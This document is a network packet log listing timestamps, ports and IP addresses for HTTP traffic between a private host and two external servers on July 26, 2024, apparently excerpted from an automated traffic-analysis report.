Jul 26, 2024 12:57:50.787220955 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.787225962 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.787235022 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.787235975 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.787256956 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.787281036 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.787461042 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.787475109 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.787482977 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.787489891 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.787537098 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.787590027 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.787605047 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.787620068 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.787635088 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.787648916 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.787655115 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.787664890 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.787679911 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.787687063 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.787694931 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.787708044 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.787710905 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.787719011 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.787725925 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.787738085 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.787743092 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.787748098 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.787781954 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.788523912 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.788537979 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.788552046 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.788566113 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.788568974 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.788578033 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.788580894 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.788594961 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.788595915 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.788608074 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.788610935 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.788625956 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.788628101 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.788635969 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.788640976 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.788652897 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.788655043 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.788666010 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.788670063 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.788678885 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.788683891 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.788696051 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.788700104 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.788712025 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.788714886 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.788726091 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.788729906 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.788742065 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.788758039 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.788768053 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.789535999 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.789551020 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.789565086 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.789580107 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.789585114 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.789594889 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.789602995 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.789619923 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.789633036 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.789633989 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.789643049 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.789649963 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.789657116 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.789664030 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.789670944 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.789679050 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.789695978 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.789709091 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.789719105 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.789724112 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.789736986 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.789761066 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.790395021 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.790410995 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.790424109 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.790438890 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.790451050 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.790453911 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.790463924 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.790468931 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.790482998 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.790493011 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.790499926 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.790514946 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.790517092 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.790529966 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.790537119 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.790545940 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.790558100 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.790560961 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.790569067 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.790575981 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.790585041 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.790591002 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.790602922 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.790607929 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.790611982 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.790623903 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.790631056 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.790642023 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.790682077 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.791238070 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.791253090 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.791265965 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.791279078 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.791290998 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.791304111 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.825378895 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.825397015 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.825412035 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.825448990 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.825476885 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.825500011 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.825514078 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.825530052 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.825544119 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.825556993 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.825579882 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.867477894 CEST	80	60839	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:50.869303942 CEST	60839	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:50.869848967 CEST	60839	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:50.874748945 CEST	80	60839	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:50.881139994 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.881174088 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.881196022 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.881233931 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.881261110 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.881263971 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.881314993 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.881359100 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.881371975 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.881392956 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.881412029 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.881438971 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.881539106 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.881558895 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.881584883 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.881603003 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.881603956 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.881627083 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.881649971 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.881930113 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.881948948 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.881973982 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.881982088 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.881993055 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.881999016 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.882015944 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.882019997 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.882028103 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.882031918 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.882061005 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.882067919 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.882078886 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.882097960 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.882121086 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.882138014 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.882138968 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.882159948 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.882163048 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.882179022 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.882184029 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.882204056 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.882217884 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.882242918 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.882514954 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.882529974 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.882558107 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.882564068 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.882575035 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.882582903 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.882606030 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.882620096 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.882622957 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.882643938 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.882647038 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.882664919 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.882668972 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.882683039 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.882690907 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.882704020 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.882708073 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.882725000 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.882733107 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.882749081 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.882771969 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.883248091 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.883265972 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.883289099 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.883306980 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.883313894 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.883332014 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.883333921 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.883349895 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.883356094 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.883368969 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.883373976 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.883387089 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.883392096 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.883414984 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.883426905 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.883435011 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.883450985 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.883455992 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.883474112 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.883476973 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.883490086 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.883498907 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.883512020 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.883516073 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.883533001 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.883541107 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.883552074 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.883577108 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.883917093 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.883930922 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.883958101 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.883965015 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.883975983 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.883976936 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.883994102 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.884001017 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.884027958 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.884051085 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.884074926 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.884085894 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.884085894 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.884099960 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.884114027 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.884118080 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.884135008 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.884141922 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.884150028 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.884162903 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.884181976 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.884198904 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.884202957 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.884221077 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.884222031 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.884244919 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.884246111 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.884257078 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.884282112 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.884819984 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.884840965 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.884885073 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.884994984 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.885010958 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.885037899 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.885040045 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.885060072 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.885061979 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.885071039 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.885080099 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.885094881 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.885101080 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.885113955 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.885121107 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.885134935 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.885142088 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.885157108 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.885159969 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.885178089 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.885184050 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.885193110 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.885202885 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.885215998 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.885220051 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.885240078 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.885243893 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.885250092 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.885265112 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.885281086 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.885282040 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.885301113 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.885313034 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.885781050 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.885801077 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.885828018 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.885839939 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.885937929 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.885953903 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.885981083 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.885999918 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.886001110 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.886024952 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.886024952 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.886046886 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.886048079 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.886065006 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.886068106 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.886085987 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.886090040 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.886107922 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.886110067 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.886126995 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.886133909 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.886151075 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.886151075 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.886172056 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.886174917 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.886181116 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.886194944 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.886215925 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.886231899 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.886255026 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.886744976 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.886764050 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.886787891 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.886791945 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.886805058 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.886811972 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.886823893 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.886831999 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.886853933 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.886869907 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.886872053 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.886892080 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.886914968 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.924302101 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.924321890 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.924345970 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.924400091 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.924432039 CEST	60836	80	192.168.2.6	198.46.178.145
